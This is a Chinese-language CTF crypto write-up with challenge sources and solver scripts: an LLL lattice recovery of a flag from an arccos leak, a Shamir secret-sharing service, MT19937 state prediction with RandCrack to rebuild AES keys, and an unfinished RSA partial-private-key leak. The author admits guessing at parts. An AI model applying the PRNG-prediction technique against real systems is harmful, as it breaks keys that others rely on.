发现直接跑LLL算法进行格基规约是跑不出来的
需要平衡一下目标向量，并且使得格体积略大于目标向量的模长，官方wp的原话
flag长度为47，则m是376位的

$$\begin{bmatrix} m & -1 & -k \end{bmatrix} * \begin{bmatrix} 1 & 0 & 2^{760} \\ 0 & 2^{376} & 2^{760}*arccos(leak)\\ 0 & 0 & 2^{760}*2\pi\\ \end{bmatrix} \ = \begin{bmatrix} m & -2^{376} & 0 \end{bmatrix}$$

# sage
from Crypto.Util.number import *
leak = 0.930663173858708735013864574261632487708466528608503618563619854272677238694112204757817175383567864768566170130001514302467697072153084760545849543698249360760783987526742296036337216144968878436793442305949050751417113202760217838648422727760945579644861599148512584771382319668482598215317149996430
acos = arccos(leak)
RF = RealField(1000)
# RealField可以指定精度，RF默认53位
pi = RF(pi)
M = Matrix(QQ,[[1,0,2^800],[0,2^376,2^800*acos],[0,0,2^800*2*pi]])
m = abs(M.LLL()[0][0])
flag = long_to_bytes(int(m))
print(flag.decode())

暂时还没搞懂，2**376和2**760所代表的具体意义，只知道它满足最小向量(?)

Shamir()

from Crypto.Util.number import getPrime,bytes_to_long
import random
from os import getenv

BANNER = """
 __          __  _                            _______       _____ _                     _      
 \ \        / / | |                          |__   __|     / ____| |                   (_)     
  \ \  /\  / /__| | ___ ___  _ __ ___   ___     | | ___   | (___ | |__   __ _ _ __ ___  _ _ __ 
   \ \/  \/ / _ \ |/ __/ _ \| '_ ` _ \ / _ \    | |/ _ \   \___ \| '_ \ / _` | '_ ` _ \| | '__|
    \  /\  /  __/ | (_| (_) | | | | | |  __/    | | (_) |  ____) | | | | (_| | | | | | | | |   
     \/  \/ \___|_|\___\___/|_| |_| |_|\___|    |_|\___/  |_____/|_| |_|\__,_|_| |_| |_|_|_|   
"""
print(BANNER)

flag = getenv("GZCTF_FLAG","GZCTF_NOT_DEFINE")
m = bytes_to_long(flag.encode())
n = getPrime(1024)
coefficients = [m] + [random.randrange(1,n-1) for i in range(100)]
print(f"n = {n}")

def f(x):
    sum = 0
    for i in range(len(coefficients)):
        sum += coefficients[i]*pow(x,i,n) % n
        sum %= n
        
    return sum

while 1:
    x = int(input("Please Input x: "))
    if x == 0:
        print("Not Allowed!!!")
        exit()
    res = (x,f(x))
    print(res)

week4

Crypto

MT19937

题目

import hashlib
import random
from Crypto.Cipher import AES
from Crypto.Util.Padding import pad, unpad
import os
from my_own_flag import flag

def MT_19937(num,en_c):
    seed1 = os.urandom(16)
    random.seed(seed1)
    number = []
    for i in range(num):
        number.append(random.getrandbits(32))
    cal = 0
    for i in range(num,num+en_c):
        cal += random.getrandbits(32)
    return number,cal

def encrypt(cal,flag):
    key = hashlib.sha256(str(cal).encode()).digest()
    A = AES.new(key, AES.MODE_ECB)
    c = A.encrypt(pad(flag,16))
    return c

def main():
    LEN = len(flag)
    m1,m2 = flag[:LEN//2],flag[LEN//2:]

    Num = 624
    # encrypt m1
    K1 = MT_19937(Num,Num)
    c1 = encrypt(K1[1],m1)

    # encrypt m1
    K2 = MT_19937(Num, Num//4)
    c2 = encrypt(K2[1], m2)

    with open('data.txt','w') as f:
        f.write(str(K1[0])+'\n')
        f.write(str(K2[0][:600])+'\n')
        f.write(str(c1)+'\n')
        f.write(str(c2)+'\n')

if __name__ == '__main__':
    main()

import random
from Crypto.Util.number import *
from randcrack import RandCrack
import hashlib
from Crypto.Cipher import AES

k1 = [1212937457, 714280275, 2934808054, 289447810, 634020656, 2582053193, 2648476152, 3584472561, 2877037797, 1051288028, 3007240724, 3583122714, 2377373219, 2233668169, 2300136290, 4277363949, 572508719, 3707687803, 868724505, 2234515288, 2182162330, 2354654192, 3676064525, 16386761, 1934246009, 396534601, 3406538372, 1978740790, 51554945, 1642830773, 3255471879, 249329746, 1871028531, 1670146144, 3955249559, 3523216280, 4225679888, 1979625069, 1711120506, 4224015378, 2357192253, 1437719734, 1861766583, 252037050, 3805173581, 3845899039, 239338040, 3335618070, 1909354144, 2380236080, 3120658839, 2738735651, 1749563272, 4028406006, 198730175, 4095736523, 2224365497, 1850797931, 123559677, 277130374, 1547602417, 2312967225, 1064405558, 620877831, 4182002366, 2717144120, 2424475877, 1261886189, 2666842961, 1250633055, 1445939400, 2496676732, 46718503, 1726056600, 2892333819, 3874613567, 2801764620, 3279121957, 62950328, 14090298, 3016963976, 235881318, 1152787765, 3549713637, 3184265794, 461262349, 1835258817, 706701716, 366259495, 2484440259, 2306336615, 2418024433, 107268664, 3018120752, 3915797798, 1685880034, 2782876985, 2876720582, 3803172243, 1745503879, 1965535595, 2831775453, 3139448870, 770826076, 559187920, 4292272948, 86904027, 1821662944, 58381562, 250790584, 2122997254, 2937312684, 3225034461, 1493971528, 913420791, 2911905254, 2938402784, 1430747115, 2654595902, 3315197237, 602765188, 1471009311, 3788529131, 913593424, 3280524381, 1554400422, 3250536147, 3480550436, 821401975, 3216026683, 762420368, 1733854366, 2395038075, 533527872, 3040490234, 2855012365, 2984904790, 2830464734, 2200935030, 523059886, 3795772367, 2905400361, 667720140, 3155311553, 1860651089, 1053555607, 2889478721, 1812821011, 3391980212, 3433665687, 2480476597, 1319654037, 1076583906, 2287201297, 966928688, 2542225146, 2246098689, 3117124345, 1844896511, 3104215564, 1303510082, 2924158615, 3648677443, 3308489255, 3809196505, 3199516268, 2254502655, 2126047470, 1763846642, 3851973930, 1280609700, 2415985988, 1312349771, 2103486452, 4229394974, 1937464844, 2763672456, 1366425769, 1532462738, 1864298394, 1203192658, 3679892306, 4138733297, 39437090, 1317880030, 132948638, 2315846286, 3394291148, 3207221552, 3834885856, 2367158425, 3183864791, 3303289072, 519407526, 4127464161, 1556426685, 2427155757, 2010011401, 2823249259, 3638339516, 2266010959, 345885116, 471672470, 2713191580, 731238671, 1694687550, 2523761501, 3533913138, 163820753, 1829608711, 587056408, 1129980234, 3642159144, 2546599527, 758703728, 1713442774, 1864598338, 2763096157, 2308766766, 1132350895, 2776604596, 1921085522, 1409581297, 2643399928, 3285649744, 1248611904, 2694186262, 2676127368, 2579578748, 3784393865, 2655293049, 1378866508, 1251610536, 1048557165, 3045231444, 4236456301, 2496231577, 4118010676, 3079411364, 2425576144, 2431718306, 543894373, 118186072, 2594647421, 1833894329, 3876640493, 1916631983, 2765860034, 3905895682, 2207230275, 2554838603, 3199831939, 2516271151, 3080023814, 3594335532, 1197450849, 2621744299, 447615180, 1616950869, 3109651542, 2553431350, 4165466937, 2130063794, 1459492895, 1141470511, 948009682, 325807524, 1681494454, 3137320840, 4219461371, 609761579, 942363481, 2404858793, 1697226342, 830264373, 230968933, 831865647, 4164463522, 2968510743, 1464271639, 1397831008, 2559413030, 3515044508, 772056268, 3152446673, 3117754594, 833212973, 4252629747, 2565179775, 3005093783, 3595030314, 4042182692, 298671165, 3183128227, 3429794312, 4122368172, 1900961662, 3589294443, 3190786481, 1744404482, 1921785452, 3011999869, 642164068, 3695788414, 2275346981, 1428956574, 2697326707, 2202213004, 3287889517, 919861723, 726410498, 337174656,
      2417998504, 2752587611, 3856581958, 141509063, 1762431188, 2065705145, 2031960873, 1892209091, 2395039500, 1058479586, 1537034270, 502217054, 3102018820, 1433274316, 1372952271, 2918921770, 239909451, 1398298200, 2339489735, 372558373, 2263872236, 2426192905, 337209508, 3983991978, 2574803724, 2837664572, 1569892789, 2625063195, 3262762020, 24150029, 2016099290, 2239153990, 85602273, 973040529, 2956276779, 4218049523, 2043716624, 2788573458, 1218787308, 939708241, 2861205992, 2427634523, 4128874493, 2326852266, 2593724377, 1680473968, 2763572707, 4240616686, 2863701585, 3551633590, 1765256405, 2110583291, 357590304, 2511138801, 859903599, 35591840, 3786321031, 3559501147, 3107666783, 2356867678, 1369801910, 2488594855, 2148205170, 3944224524, 2219844222, 466009157, 2328231114, 2777059464, 1585865212, 2871297568, 2558165993, 1561563095, 438633926, 2619385032, 2185942244, 2501145168, 2161107203, 912485991, 3956413626, 4065963551, 1527306118, 378382496, 1016367697, 82832444, 2484726280, 867566307, 1037338825, 4291735272, 901722138, 3956112428, 1060890097, 4210262544, 2525835262, 786274933, 2563584713, 2738164238, 3438656534, 564065202, 3288501195, 1074332184, 2947775555, 3790174897, 3607901153, 2332098514, 3648669449, 3879104921, 3983960923, 548882335, 1817587379, 1555057777, 2705918139, 2755720626, 2706833366, 2947946695, 3082750952, 2323554320, 1804494628, 1677086381, 2771841028, 2470056271, 3431120732, 4073503495, 2929631518, 80800254, 605951710, 1664206366, 2498279527, 360922649, 2590660538, 3724444465, 3559953317, 3002864163, 3369368155, 1569518356, 3831143803, 4184782515, 1602338537, 2640186368, 2864951447, 514648741, 887020932, 166121609, 476244781, 2238614863, 3039706334, 3586500526, 3038068930, 3989751746, 3699955508, 3559348520, 884358906, 444882591, 3769021913, 3665754928, 1911261614, 1234192084, 3450557803, 3232410240, 494096069, 660552292, 1365481833, 520081058, 1027987838, 3165505556, 1257833693, 2146291679, 3634622224, 589123893, 1195030125, 1602406253, 772753497, 2661121530, 2938530200, 1070706826, 3890477657, 2112901265, 4253917692, 2291562806, 67613984, 2608069358, 1726139310, 3018885048, 367067728, 3838771641, 1357927847, 2616452172, 722979624, 4153031784, 607660099, 3164865398, 3199368055, 1885230388, 1055777913, 3475913336, 1546318749, 578282810, 1558944130, 2955660875, 2214838829, 4202836988, 1405916968, 2593459723, 3648360966, 3644813488, 598912719, 876098814, 355483438, 685352898, 4099087273, 2983380912, 450980374, 2753208777, 429297943, 3462109454, 3134522829, 2064548393, 2200750558, 4247753845, 251220053, 1556849099, 2022648175, 3563632884, 2175932589, 1463719656, 1887673611, 3541708446, 3033219582, 3255799816, 534398633, 3481196045, 825005812, 1629237540, 640085217, 899503755, 3105157116, 488231507, 2708835929, 2648663900, 2048030022, 1503411342, 4059850866, 1281156549, 3171426598, 2637361895, 1110841056, 606897504, 3001264062, 912267483, 148124465, 202684836, 1425732680, 3637635336, 1455737055, 2977077407, 54987379, 1056796337, 1832170261, 1870208138, 4074249428, 2993704297, 381772606, 2362720677, 2164369676, 250156737, 3409786877, 1590821450, 2959971180, 3682255149, 302283211, 4204651015, 1294232346, 3088162584, 4209012441, 784333825, 1275400791, 885466807, 1249631254, 1236809354, 2627231325, 2391839654, 1638467843, 2797229961, 3799496431, 237846505, 3432655604, 1690038717, 1493561006, 4229115929, 3784624191, 2891696687, 3557702324, 1120718375, 2593253432, 1415584860, 551110044, 1510986691, 3267929936, 2341598281, 247215742, 3192053018, 2856032615, 3290505354, 907961089, 4128700570, 4195745607, 2035634741, 1047086449, 216435127, 1997121891, 3391563810, 2813128796, 1517545322]

k2 = [2137201486, 2243095490, 3817098931, 229608464, 73854451, 2470370137, 647955184, 1997583099, 2122796155, 3754429965, 915090235, 3330907022, 4045925639, 1616378187, 3477748127, 3235608209, 4168058459, 137624259, 2992531650, 509166204, 3920545433, 1915159362, 3901263233, 4228481818, 2816405167, 1786108715, 3305752402, 2384763695, 227465801, 1052658065, 3153900057, 117311308, 1595474528, 1087880165, 3166831564, 1588364714, 528237288, 617272354, 618281932, 1618791873, 3810883062, 894018392, 2575794219, 103568311, 3298607681, 536028939, 3467146346, 2201685940, 1076138845, 918210863, 1341794665, 3456513087, 1710914773, 1894309846, 2312381988, 127727152, 876614149, 1709878784, 1156541415, 1555452594, 182448271, 408344822, 2898434231, 1998211488, 3592206445, 1085073460, 3397525879, 663024038, 3434587726, 2768736843, 617681814, 2865397550, 3463093384, 2746629701, 2006818690, 1121017677, 2047400279, 1921768902, 528024592, 2892263293, 2798869302, 3481658697, 2848153687, 1134481165, 3720776629, 486120970, 2683483151, 3252410704, 2891974166, 2121509882, 4160792826, 2915283137, 4014112386, 1792273527, 805496405, 1407962158, 3622679727, 3512697173, 2901255951, 3111681208, 2877903904, 827923100, 3729787569, 925768344, 923906770, 3606973890, 1181029191, 689515782, 1651144572, 3459362488, 2412684107, 1362064386, 4159398924, 2922809145, 1602978249, 3705882625, 4293462677, 764953390, 4178674632, 2074025926, 1925824438, 2523046149, 1263372335, 1677306491, 760292173, 3736532489, 2036587975, 514100070, 706857874, 1060105302, 2578078966, 2320134376, 3639164974, 1710455599, 45505402, 2407597519, 2537656373, 56251495, 1630733521, 519864415, 1444518872, 513906964, 3852284907, 800496493, 872675679, 3155530732, 683268660, 3856797215, 137673146, 3607443770, 3700387644, 965766446, 2454233777, 954672952, 2855774032, 3552757435, 3025907069, 1402938518, 3041387870, 3456472325, 447871942, 1327563590, 620160190, 1007188755, 180115074, 52020277, 1774723235, 2887773879, 3508414970, 3631951842, 1763635376, 1924307117, 4204987693, 2494477117, 4017134019, 368620157, 2814392181, 2199699352, 1158269085, 2580589087, 1747804339, 1012560482, 933361529, 176586313, 2808905110, 83750114, 3090684109, 1767704883, 4189833886, 4249260150, 2157821862, 2112716220, 261010276, 3168798078, 1920566780, 1823590666, 2244335700, 2816218464, 3295774792, 2283997010, 3733740723, 3169836042, 1782097885, 1421909608, 3071286976, 2529056825, 2917504380, 2500113967, 1340022169, 1325786585, 2696541388, 3763160733, 3603998832, 72655495, 2892272720, 2785458061, 1724578654, 2144338844, 2899719547, 318345339, 2511462884, 3220707099, 1676208778, 2586878575, 3209502577, 3013180194, 2700788434, 3611106949, 1712906930, 3381158761, 962420077, 1928661992, 1241692316, 3587734972, 2361851891, 729570171, 1255993130, 2059230370, 3819451535, 2490865889, 1229457976, 3062266381, 3350574651, 1861939269, 3074031276, 1122137253, 3267903554, 2691684836, 3042505532, 1103427454, 2126863565, 3686667924, 4181984974, 238390653, 2037278833, 2930470784, 424623283, 3074336567, 4019540123, 447553681, 491252047, 2134100060, 3683266682, 2218397687, 1535505498, 628745497, 445350701, 186184731, 3190072310, 1084556173, 277509904, 2898643406, 4292667973, 2903270520, 2565372604, 303440546, 1808627640, 3069152665, 2075086265, 350493108, 3426866771, 1167370872, 2856612905, 1133769957, 2168578594, 361418126, 1788736419, 3450707887, 1988560242, 3106183307, 420765626, 1595814948, 813997149, 2474462651, 3945801301, 1785414095, 4177305184, 3071687740, 1273724577, 4178527412,
      2536332142, 2692000853, 2172897829, 1472311250, 1630835977, 2274186143, 3947343331, 1836099636, 3955763613, 271610193, 2479541262, 3666471942, 4217699594, 341808580, 1517926781, 3311123634, 1738600938, 3870938757, 2309182531, 3189576099, 1594683626, 1900151562, 3625455382, 3527220315, 471268317, 4085391597, 1205291118, 1903466784, 934489768, 717103328, 407385599, 1146912039, 2148396650, 3906209540, 3002211292, 4003244728, 1595357238, 4224659669, 3679773598, 1554305724, 1879798896, 856183762, 2448013518, 2839667183, 3541976537, 1201501683, 2210517506, 3074699110, 2545660131, 3696626258, 1684534318, 3093429986, 2603224784, 3784468515, 1931537793, 570789340, 376758771, 2307788100, 2180860578, 201860820, 3293433128, 1396840567, 2231737923, 3343569549, 890147328, 3369945506, 3155052764, 4225372249, 3097945008, 1976073442, 1939061106, 3009821364, 3636790064, 1722351481, 571067187, 3660829870, 625774796, 962877120, 4093260308, 2994561947, 1780515932, 4180215026, 4252365298, 2947348994, 2484307881, 1869054839, 1567538899, 2381016872, 650248596, 2837463974, 3547259433, 1653667021, 276270749, 1685266082, 3605301102, 3560229703, 3732548108, 3643340502, 2787020632, 301650068, 1692193275, 3053122330, 446613045, 753748541, 3639322954, 2521151846, 3846032512, 2540737292, 1022192711, 4242180248, 2050165414, 2033316505, 3063183472, 2547887329, 1562411323, 2846186023, 1057549601, 200005518, 2515317663, 614142733, 2822762719, 1111596810, 730033186, 3539522165, 2876952827, 1093300071, 2988803720, 2788643910, 1815173676, 923492540, 1571870569, 1732017323, 3912738621, 1932484987, 1369226061, 1043943980, 659920686, 87860672, 3117771700, 536701, 1276716714, 399069847, 675178237, 4148780498, 2293633457, 510556418, 3306441120, 3969884840, 931665570, 1269866789, 1486094185, 1896845492, 2955478105, 3949294788, 2483398248, 2792552965, 367597061, 955979053, 4141216471, 3162398417, 783759084, 605101703, 3200303074, 1835668453, 3586071304, 2174558649, 2997422459, 3634493394, 4138976583, 164027380, 490279465, 2469644175, 43130477, 1547916166, 2406583577, 1303190434, 1431585058, 1519905099, 1079834268, 231749295, 1635997362, 1423407810, 2814537500, 2894136671, 3686889877, 1812711299, 4226627996, 3754118359, 20804048, 4285391186, 2958387414, 2233166520, 3070925064, 1320913219, 2976334802, 4041836979, 382095839, 1388937175, 1819247059, 3838255239, 3380204370, 3935811842, 2751480313, 164540071, 2340071112, 610666648, 595972300, 2011517128, 213838138, 4255091509, 3777157969, 2402199559, 3852693289, 4206005132, 3787527275, 1471785983, 2589388076, 631286274, 3524096200, 590972337, 1887865600, 1760603763, 643231370, 2643740969, 2388499010, 1722852753, 645073667, 3177739276, 1242181637, 2984331308, 567911875, 753620395, 3743678155, 4278357119, 2815496781, 1270587449, 4259346098, 589049437, 3257834517, 3637173709, 2882662502, 2892380404, 1843952012, 2832065071, 1053718106, 330418109, 3909969653, 916711438, 3709287944, 2455153252, 763050070, 1667025352, 3019273370, 3814458403, 1093369006, 3332713718, 752637853, 100085835, 523535862, 4068027345, 1845694557, 2754500540, 3395089568, 2675873208, 525907800, 937117572, 3313729567, 1112554253, 114888315, 619966459, 1641381760, 1017743298, 1178701646, 1581336326, 362103885, 3516308826, 869224156, 376989708, 633412018, 1074308065, 3818889570, 4249601414, 2417156426, 2229939059, 1313267093, 2929434755, 783116601, 1643811645, 996372459, 3352907069, 953035592, 1641549976, 2112115418, 1350813227, 3528081888, 1136982588, 1390912242, 2659886726, 1031606598, 2617877628]
c1 = b'\x04\xd6k\xe5:\x9a\xabu\xb3\r\x06\xd9\x8e\x04\x87\xc7\x10\xecv\x0bG,\x9c\xb5\xb5q\xd6\x9c\xb8\xb7\xb1d'
c2 = b'CT\x1a>\x12\x8ff"\x89\xde\x9a\x0f\xf4\xac\xa2\xe7\xd2%\x15\xdd`\x03\xf4?u\x07#\xf9\x03\xde\xd4\x97'
rc = RandCrack()
for num in k1:
    rc.submit(num)
cal = 0
for i in range(624):
    cal += rc.predict_getrandbits(32)
key = hashlib.sha256(str(cal).encode()).digest()
aes1 = AES.new(key, AES.MODE_ECB)
flag1 = aes1.decrypt(c1).decode()
rc = RandCrack()
for i in range(600):
    rc.submit(k2[i])
for i in range(600, 624):
    rc.submit(random.getrandbits(32))
cal = 0
for i in range(624//4):
    cal += rc.predict_getrandbits(32)
key = hashlib.sha256(str(cal).encode()).digest()
aes2 = AES.new(key, AES.MODE_ECB)
flag2 = aes2.decrypt(c2).decode()
flag = flag1+flag2
print(flag)

这里考察的是MT19937随机数生成算法，在flag1中由于我们知道了前一轮的所有随机数(624个随机数)，因此我们可以通过RandCrack()预测下一轮的随机数

而flag2中，题目只给了我们前600个随机数，还缺少24个随机数才能组成一轮完整的state，于是我有个大胆的想法，给它随机的24个随机数会怎么样，结果误打误撞解出flag了，想查查到底是什么原因，但都没找到相关的介绍，都是教我怎么逆MT19937算法的跟简单介绍，貌似用处不大

但，伟大的糖醋小鸡块师傅在他的博客中帮我解疑了，Orz
https://tangcuxiaojikuai.xyz/post/1dda48e6.html

rsa()

#https://github.com/jvdsn/crypto-attacks
n = 149172698687247343307484774427463947040435385939538317995577802933708356659744781308849658149199463270402946054959026247011496643609722381036883462993606208405454448793748282856217226973570288117498818638210423816294135228225752144034736417495450129714250843040389723696691326017062575682989124677170212774709
e = 117932126002671581139669626170313849654365346787524775666511151162210096339679521576248537514813055641658722582914817481701142826861992970974206985137736311670025047752207632786439134855261541672012123572997654885689727972923659090161642085293034838535696206768459211817851404605357080649176502772728128885161
c = 5560665954852260703690321742771294743847646190564920056638605621636133720600072404637746086157764356927591996611862975162275415163691292729424412545560091018172812509230401361899309377868998693154480684535377865697939714965280441927137203589475324582174585416573174423912557361267766810988676863548944796515
dm = 0x2498aa4c85de5a33d5766f28d879f0df7175f43dd71cd4ab56ab67bf76334e6e3dcb
dl = 0x4c21c14305c34ed8f5e8879452c4ce569ce0789e6b39
d_zj=???

d的高低位泄露，见糖醋小鸡块师傅的高校密码挑战赛赛题5
https://tangcuxiaojikuai.xyz/post/4a67318c.html
由于我使用的是sage10.4与师傅使用到的sage10.2不一样，脚本使用到的部分函数在10.4版本中已经进行了调整，不会改脚本了QWQ

如果要安装sage指定版本的话，貌似要从源码进行编译，坏就坏在这些地方了，最新版也不是想象中的那么好

总结

格密码方面的知识储备非常薄弱，QWQ